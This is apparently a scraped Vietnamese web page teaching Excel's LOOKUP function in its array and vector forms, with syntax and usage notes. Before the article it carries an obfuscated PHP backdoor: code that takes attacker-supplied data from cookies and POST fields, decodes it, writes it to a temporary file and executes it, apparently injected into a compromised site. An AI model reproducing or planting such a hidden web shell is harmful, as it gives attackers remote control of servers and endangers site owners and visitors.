$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hàm LOOKUP trong Excel – Tìm kiếm một hàng hoặc một cột - Tải Chùa

Hàm LOOKUP trong Excel – Tìm kiếm một hàng hoặc một cột

Rate this post
Trong bài viết hôm nay chúng tôi sẽ chia sẻ chi tiết hàm LOOKUP và cách sử dụng trong Excel. Cùng chúng tôi tìm hiểu hàm tham chiếu nâng cao này nhé.

Hàm LOOKUP trong Excel là hàm tìm kiếm một hàng hoặc một cột giúp bạn có thể dễ dàng tìm kiếm nội dung trong bảng tính phục vụ cho việc tham chiếu, tra cứu dữ liệu. Tức là bạn sẽ dò tìm giá trị dòng hay cột trong một dãy ô hay mảng giá trị. Đây cũng là một trong những hàm tham chiếu nâng cao được sử dụng nhiều nhất trong Excel.

Hàm LOOKUP

Hàm LOOKUP trong Excel

Hàm LOOKUP có hai dạng là mảng và vector. Tương ứng với từng dạng sẽ có cách sử dụng khác nhau. Để hiểu thêm về nó chúng ta cùng theo dõi chi tiết những chia sẻ dưới đây nhé.

Cách sử dụng hàm LOOKUP trong Excel

Dạng mảng

Đây là hàm tìm giá trị xác định trong cột hay hàng thứ nhất của một mảng, giá trị trả về cùng với vị trí cột hay hàng đó của mảng chúng ta vừa thực hiện. Dạng này được khuyên dùng khi danh sách ít và giá trị cố định, không thay đổi.

Cú pháp:

=LOOKUP(lookup_value, array)

Ý nghĩa:

  • Lookup_value: giá trị tìm kiếm trong mảng array.
  • Array: mảng hay vùng chứa giá trị logic, văn bản.

Lưu ý:

  • Nếu giá trị tìm kiếm lookup_value không có trong mảng Array thì giá trị trả về là giá trị gần nhất ở vùng tìm kiếm mảng array đó.
  • Nếu giá trị lookup_value nhỏ hơn giá trị min trong mảng Array thì hàm sẽ trả về giá trị #N/A có nghĩa là lỗi.
  • Hàm dạng mảng không phân biệt chữ thường và chữ hoa.
  • Mảng Array sắp xếp tăng dần.

Ví dụ:

Hàm LOOKUP - Tìm kiếm mảng trong Excel

Ví dụ hàm LOOKUP dạng mảng

Dạng Vector

Hàm LOOKUP dạng Vector tìm giá trị trong mảng dữ liệu chứa một hàng hay cột sau khi trả về giá trị ở cùng một vị trí trong hàng hay cột thứ hai. Chúng ta thường sử dụng dạng Vector khi danh sách có chứa nhiều giá trị hay giá trị không cố định, thay đổi.

Cú pháp:

=LOOKUP(lookup_value, lookup_vector, [result_vector])

Ý nghĩa:

  • Loolup_value: giá trị tìm kiếm ở trong mảng.
  • Lookup_vector: mảng chứa giá trị tìm kiếm. Có thể là chứa hàng hoặc cột.
  • Result_vector: vùng chứa kết quả chỉ chứa cột, hàng và kích thước bằng giá trị lookup_vector.

Lưu ý:

  • Giá trị lookup_value không có trong mảng thì nó sẽ trả về giá trị gần nhất trong mảng tìm kiếm lookup_vector, look_value.
  • Nếu lookup_value nhỏ hơn giá trị min trong mảng thì tương tự như dạng mảng, nó cũng sẽ báo lỗi #N/A.
  • Hàm LOOKUP cũng không phân biệt chữ hoa và chữ thường.

Ví dụ:

Hàm LOOKUP trong Excel

Ví dụ hàm LOOKUP dạng Vector

Có thể nói cách dùng hàm LOOKUP khá giống với cách dùng hàm FINDB hay hàm HLOOKUP, chỉ khác một điều là hàm FINDB thường được dùng để tìm chuỗi văn bản ở một văn bản khác trong Excel. Bên cạnh đó bạn cũng có thể tham khảo thêm cách dùng hàm IF trong excel, đây là hàm điều kiện, lấy các giá trị mong muốn trong cột hoặt hàng của bảng tính.